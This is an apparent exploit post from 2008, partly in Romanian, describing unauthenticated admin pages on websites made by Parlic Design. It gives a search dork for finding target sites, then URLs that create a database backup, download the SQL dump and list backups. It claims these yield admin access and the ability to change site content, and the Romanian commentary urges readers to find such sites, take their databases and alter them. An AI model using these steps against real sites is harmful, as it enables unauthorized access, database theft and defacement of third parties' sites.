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Parlic Design Vuln

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# Discovered by: paxnwo
# Mail: paxnwo@yahoo.com
# 26.oct.2008
~| D0rk: design and developed by Parlic Design
~| Exploit1: /admin/backup/backup.php
<!-- creates a backup of the db and provides you its name. eg : 26-10-2008 01-35.sql -->
~| Exploit2: /admin/backup/dump/db-backup-name.sql
~| Usage: www.site.com/admin/backup/dump/26-10-2008 01-35.sql
~| Exploit3: /admin/backup/list.php
<!-- lists the avaible backups. you are now loged in as admin; you can change the content -->

nu e mare lucru :) puteam sa postez la show-off toate site-urile create de Parlic Design si vai ce mare hacker sunt eu :))

ca sa studiati contentul /admin/ , am gasit un site tot de la Parlic Design care nu e protejat: Index of /admin .

pe langa faptul ca puteti sa puneti mana pe baza lor de date, pe unele merge sa si modificati contentul . jucati-va si o sa mearga .


Daca gasesti un site de la Parlic Design poti folosi exploiturile lui paxnWo.

Usage exploit1: www.site.com/admin/backup/backup.php
Usage exploit2: www.site.com/admin/backup/dump/26-10-2008 01-35.sql
Usage exploit3: www.site.com/admin/backup/list.php

Bravo paxnWo! :)

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